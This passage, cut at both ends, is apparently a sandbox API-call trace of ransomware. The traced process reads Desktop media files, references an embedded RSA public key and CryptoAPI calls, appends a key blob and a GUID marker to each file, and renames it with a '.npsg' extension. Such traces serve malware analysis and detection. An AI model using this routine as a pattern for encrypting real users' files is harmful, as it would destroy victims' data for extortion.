dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.356] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=90908) returned 1 [0236.356] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.359] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x162f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.359] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.361] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x1631c, lpOverlapped=0x0) returned 1 [0236.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.363] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.364] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.364] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.364] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.364] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.364] GetLastError () returned 0x0 [0236.364] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.364] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.364] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.364] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.364] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.365] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.366] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1631c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.366] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.366] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.366] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.366] CloseHandle (hObject=0x644) returned 1 [0236.368] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pYabFVF0oorlqx_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pyabfvf0oorlqx_.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pYabFVF0oorlqx_.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pyabfvf0oorlqx_.wav.npsg")) returned 1 [0236.378] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3848c940, ftCreationTime.dwHighDateTime=0x1d5c411, ftLastAccessTime.dwLowDateTime=0x46ecd4e0, ftLastAccessTime.dwHighDateTime=0x1d5bbf7, ftLastWriteTime.dwLowDateTime=0x46ecd4e0, ftLastWriteTime.dwHighDateTime=0x1d5bbf7, nFileSizeHigh=0x0, nFileSizeLow=0x9e5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rhUiwWu_kT.avi", cAlternateFileName="RHUIWW~1.AVI")) returned 1 [0236.378] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rhUiwWu_kT.avi") returned=".avi" [0236.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rhUiwWu_kT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rhuiwwu_kt.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.379] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=40539) returned 1 [0236.379] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.382] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9e35, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.382] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.383] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x9e5b, lpOverlapped=0x0) returned 1 [0236.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.383] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.385] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.385] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.385] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.385] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.385] GetLastError () returned 0x0 [0236.385] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.385] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.385] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.385] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.385] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.386] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.386] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9e5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.386] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.386] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.386] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.387] CloseHandle (hObject=0x644) returned 1 [0236.392] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rhUiwWu_kT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rhuiwwu_kt.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rhUiwWu_kT.avi.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rhuiwwu_kt.avi.npsg")) returned 1 [0236.394] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab3bcae0, ftCreationTime.dwHighDateTime=0x1d5c08a, ftLastAccessTime.dwLowDateTime=0x15d7e320, ftLastAccessTime.dwHighDateTime=0x1d5b7f8, ftLastWriteTime.dwLowDateTime=0x15d7e320, ftLastWriteTime.dwHighDateTime=0x1d5b7f8, nFileSizeHigh=0x0, nFileSizeLow=0x8f15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sz0r8g1H.jpg", cAlternateFileName="")) returned 1 [0236.394] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sz0r8g1H.jpg") returned=".jpg" [0236.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sz0r8g1H.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz0r8g1h.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.394] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=36629) returned 1 [0236.394] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.397] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8eef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.397] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.398] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x8f15, lpOverlapped=0x0) returned 1 [0236.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.399] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a440) returned 1 [0236.400] CryptCreateHash (in: hProv=0x67a440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.400] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.400] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.400] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.400] GetLastError () returned 0x0 [0236.400] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.400] CryptReleaseContext (hProv=0x67a440, dwFlags=0x0) returned 1 [0236.400] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.400] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.400] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.400] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.401] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8f15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.401] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.402] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.402] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.402] CloseHandle (hObject=0x644) returned 1 [0236.403] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sz0r8g1H.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz0r8g1h.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sz0r8g1H.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sz0r8g1h.jpg.npsg")) returned 1 [0236.405] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdbcdd60, ftCreationTime.dwHighDateTime=0x1d5c37e, ftLastAccessTime.dwLowDateTime=0x594c6210, ftLastAccessTime.dwHighDateTime=0x1d5b8e4, ftLastWriteTime.dwLowDateTime=0x594c6210, ftLastWriteTime.dwHighDateTime=0x1d5b8e4, nFileSizeHigh=0x0, nFileSizeLow=0x235f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TAd_29kocAxghHF.png", cAlternateFileName="TAD_29~1.PNG")) returned 1 [0236.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TAd_29kocAxghHF.png") returned=".png" [0236.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TAd_29kocAxghHF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tad_29kocaxghhf.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.405] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=9055) returned 1 [0236.405] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.408] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2339, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.408] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.409] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x235f, lpOverlapped=0x0) returned 1 [0236.409] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.409] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.409] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.409] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0236.410] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.410] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.410] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.411] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.411] GetLastError () returned 0x0 [0236.411] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.411] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0236.411] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.411] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.411] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.411] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.412] SetFilePointerEx (in: 